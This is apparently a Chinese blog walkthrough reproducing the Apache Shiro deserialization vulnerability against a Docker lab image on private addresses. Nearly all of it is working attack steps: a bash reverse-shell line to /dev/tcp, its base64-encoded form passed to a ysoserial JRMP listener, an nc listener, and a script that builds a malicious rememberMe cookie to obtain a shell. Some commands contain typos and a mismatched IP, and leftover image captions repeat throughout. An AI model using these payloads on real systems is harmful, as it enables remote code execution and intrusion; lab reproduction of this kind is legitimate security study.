搭建环境请参考:https://www.jianshu.com/p/0007eafd1f92
复现请参考:https://mp.weixin.qq.com/s/KkWL9SftCZSdkglW39Qw0Q
靶机:192.168.19.147
攻击机:192.168.19.146

搭建环境

  • 获取docker镜像
    Docker pull medicean/vulapps:s_shiro_1
  • 重启docker
    system restart docker
  • 启动docker镜像:
    docker run -d -p 8081:8080 medicean/vulapps:s_shiro_1
    访问:
    http://192.168.19.147:8081/ 环境搭建成功
    shiro反序列化漏洞复现

制作反弹shell 代码

  • 使用http://www.jackson-t.ca/runtime-exec-payloads.html 进行编码

bash -I >& /dev/tcp 192.168.19.147/1234 0>&1
shiro反序列化漏洞复现

使用ysoserial中JRMP监听模块,监听6666端口

  • 攻击机中执行命令:
    java -cp ysoserial.jar ysoserial.exploit.JRMPListener 6666 CommonsCollections4 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE5LjE0Ni8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}'
    shiro反序列化漏洞复现

监听反弹端口 1234

  • 攻击机中执行命令:
    nc -lvnp 1234
    shiro反序列化漏洞复现

生成poc

  • 攻击机中执行
    python shiro.py 192.168.19.146:6666
    得到rememberMe
    shiro反序列化漏洞复现

利用POC进行攻击:

登录系统:
shiro反序列化漏洞复现
抓取登录后的数据包:
shiro反序列化漏洞复现
发送修改后的数据包,攻击成功
shiro反序列化漏洞复现
成功获取shell
shiro反序列化漏洞复现

相关文章:

  • 2021-07-04
  • 2021-07-30
  • 2021-05-31
  • 2021-05-24
  • 2022-12-23
  • 2021-08-12
  • 2021-11-21
猜你喜欢
  • 2022-12-23
  • 2021-04-16
  • 2021-07-01
  • 2021-09-30
  • 2022-12-23
  • 2022-12-23
相关资源
相似解决方案